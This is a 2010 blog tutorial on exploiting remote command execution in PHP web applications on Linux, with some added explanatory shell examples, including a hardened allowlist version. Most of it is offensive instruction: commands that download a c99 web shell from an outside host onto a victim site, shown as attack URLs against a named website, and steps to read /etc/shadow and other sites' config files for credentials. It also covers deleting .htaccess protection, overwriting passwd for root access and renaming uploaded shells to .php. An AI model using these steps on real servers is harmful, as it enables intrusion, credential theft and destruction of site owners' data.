Thursday, August 12, 2010

Remote Command Execution (RCE) Vulnerability ::: Exploiting In Linux


Remote Command Execution is a kind of vulnerability in which you are able to run commands on the victim server.
It is usually a high-risk vulnerability, and there are many ways of using it to get access to the victim server.
Whenever the value of a variable such as "cmd" is passed to a function that runs commands, such as system(), passthru(), exec() or shell_exec() in PHP, and you are able to inject your own command into that variable, RCE happens. These functions hand the whole string to a shell, so even when the variable is only meant to be an argument, metacharacters such as ; | && and backticks let you append a command of your own.
There are many ways of using this vulnerability; let's talk about the major ones:
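As an added example (not code from the original post), here is the same pattern shown in shell rather than PHP. list_dir_vulnerable mimics PHP like system("ls -d " . $_GET['dir']): the value is pasted into a command string that a shell re-parses, so a value of "/; echo INJECTED" runs the extra command. list_dir_safe is the hardened version: the value is checked against an allowlist and passed as a single argument, so nothing re-parses it. Both function names are mine.

```shell
#!/bin/sh
# Added example (not from the original post): the RCE pattern in shell.
# list_dir_vulnerable mimics PHP such as system("ls -d " . $_GET['dir']):
# the untrusted value is pasted into a command string that a shell re-parses,
# so metacharacters (; | && ` $()) let the caller run arbitrary commands.
list_dir_vulnerable() {
    sh -c "ls -d $1" 2>/dev/null
}

# Hardened version: the value is checked against an allowlist of characters
# (and '..' is rejected), then passed as a single argv element after '--'.
# No shell re-parses it, so "/; echo INJECTED" is refused rather than run.
# Exit status 2 means "rejected input".
list_dir_safe() {
    case "$1" in
        ""|*[!A-Za-z0-9_./-]*|*..*) return 2 ;;
    esac
    ls -d -- "$1" 2>/dev/null
}

# Demo: the injected 'echo INJECTED' runs only through the vulnerable wrapper.
echo "vulnerable:"; list_dir_vulnerable '/; echo INJECTED'
echo "safe:"; list_dir_safe '/; echo INJECTED' || echo "rejected, status $?"
```

The allowlist is the real fix; quoting alone (escapeshellarg in PHP) stops the injection but still lets an attacker pick any path the web server user can read.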

1-Downloading a shell script onto the victim server with download commands:
In Linux there are several commands that let you download a file onto the server. Which of them are installed (and whether outbound HTTP is allowed at all) varies from server to server, so if one fails try the next.
Let's see an example:
We have RCE in this website.


Now we are able to inject the "cmd" variable.
We want to download the file onto the server, so we use one of these commands:

lwp-download http://[shell]

wget http://shell -O shell.php

fetch -o shell.php -p http://shell

lynx -source http://shell > shell.php

links -source http://shell > shell.php

GET http://shell > shell.php


In my example, wget didn't work, so I tried lwp-download and downloaded the c99 shell script onto the server, then renamed it from c99.txt to c99.php.

http://angelptc.info/index.php?view=help&faq=1&cmd=lwp-download http://sh3llz.org/c99.txt
http://angelptc.info/index.php?view=help&faq=1&cmd=cp c99.txt c99.php

Well done, now we have the c99 shell script at http://angelptc.info/c99.php .


2-Reading files:

 2-1: Reading the shadow file: /etc/shadow is the most important file in Linux. By default it is readable only by root (and the shadow group on some distributions), but sometimes it is misconfigured to be world-readable. Check with ls -l /etc/shadow, and if it is readable, read it with: cat /etc/shadow
After that you can crack the hashes and get root access.

 2-2: Reading configuration files:
 Sometimes, in some websites and content management systems, there is useful information in the configuration file. For example in Joomla/Mambo there is a section with the FTP username and password, and sometimes the website owner reuses the hosting control panel password as the database password.
In some web applications the administrator username and password are stored in files, so you can read those and find them.
You can read a configuration file with the cat command.

 2-3: Reading other hosts' web application configuration files:
 You can also read the configuration files of other sites hosted on the same server, to gain information such as FTP and hosting control panel credentials. This works when their files are readable by the user your command runs as, which is common on shared hosting where every site runs under the same web server account.

3-Removing files: In some web applications the administrator folder is password protected; you can remove the file that causes this protection and use the administrator folder.
For example, with the Apache web server an .htaccess file protects the folder; you can delete it with rm -f .htaccess and use the administrator folder (rm -rf also works, but -r is only needed for directories). This only succeeds if the user you run as has write permission on that directory, and it is destructive and easy for the owner to notice.
Also, in some web applications the file manager or upload center is password protected in the same way, and you can remove that protection with rm as well.


4-Updating files:
In RCE, editing a file is hard because Linux editors such as vi and nano are interactive and need their own keystrokes for saving and editing, so instead you replace the file. (Non-interactive tools such as sed -i, or writing the file with echo/printf and output redirection, can also edit it in place without the round trip below.)
Updating files is useful. For example, if the passwd file is writable by your user (a misconfiguration, since by default it is writable only by root), you can read it, delete it and then download a passwd file that you have edited to give yourself root access.
You can also update configuration files and the files that store usernames and passwords to gain administrator access.
Steps of updating:
-Read the file and save it to your computer (cat command)
-Remove the file (rm -f command)
-Change the file you have saved and upload it to a web server you control
-Download the edited file to the victim server and rename it to the original name (download commands such as wget, GET and so on, then mv)
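As an added example (not from the original post), here is the update step done in place, without the cat / rm / re-download round trip: a small sh script that changes one value in a constructed sample config with sed via a temp file (so the original file's owner and mode survive), keeps a .bak copy, and reads the value back to verify it. The function names and the sample config are mine.

```shell
#!/bin/sh
# Added example (not from the original post): update a file in place instead
# of deleting and re-downloading it. Edits a constructed sample config with sed
# through a temp file, keeps a .bak copy, and reads the value back to verify.

# Write a constructed sample config to a temp dir and print its path.
make_sample_config() {
    dir=$(mktemp -d) || return 1
    cat > "$dir/config.php" <<'EOF'
<?php
$db_user = 'site';
$db_pass = 'oldsecret';
$ftp_host = 'ftp.example.invalid';
EOF
    printf '%s\n' "$dir/config.php"
}

# update_value FILE NAME VALUE: set $NAME = 'VALUE'; in FILE.
# Returns 1 on error, 2 if the variable was not found (file left unchanged).
update_value() {
    file=$1 name=$2 value=$3
    # caveat: this needs write access to the file itself; the rm-and-redownload
    # approach needs write access to the directory instead, and loses owner/mode.
    [ -w "$file" ] || return 1
    cp -p -- "$file" "$file.bak" || return 1
    # escape /, & and \ so they are literal in the sed replacement below
    esc=$(printf '%s' "$value" | sed 's|[/&\\]|\\&|g')
    tmp=$(mktemp) || return 1
    # "\\\$" puts a literal \$ into the sed script; $name is the variable name
    sed "s/^\(\\\$$name = \)'[^']*';/\1'$esc';/" "$file" > "$tmp" || { rm -f "$tmp"; return 1; }
    if cmp -s "$tmp" "$file"; then
        rm -f "$tmp"; return 2
    fi
    cat "$tmp" > "$file"          # overwrite contents; inode, owner and mode unchanged
    rm -f "$tmp"
}

# get_value FILE NAME: print the current value of $NAME, to verify the edit.
get_value() {
    sed -n "s/^\\\$$2 = '\([^']*\)';/\1/p" "$1"
}

# Demo on the constructed file.
f=$(make_sample_config)
update_value "$f" db_pass 'n3w/pa&ss'
printf 'db_pass is now: %s\n' "$(get_value "$f" db_pass)"
```

Overwriting the contents with cat rather than replacing the file is deliberate: mv or rm plus a fresh download gives the new file the web server user's ownership and default mode, which is both a visible change and a way to break a site that relied on the old permissions.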
 
5-Renaming an uploaded file:
Sometimes you can upload images or text files to a website but not PHP files. If there is an RCE vulnerability, you can change the name of that file.
First, rename your shell script to .jpg, .gif, .txt or similar and upload it.
Then use the mv command to change the file name:

mv file.txt file.php

or anything similar. This needs write permission on the upload directory, and the web server must be configured to execute PHP there (some hosts disable PHP in upload folders).
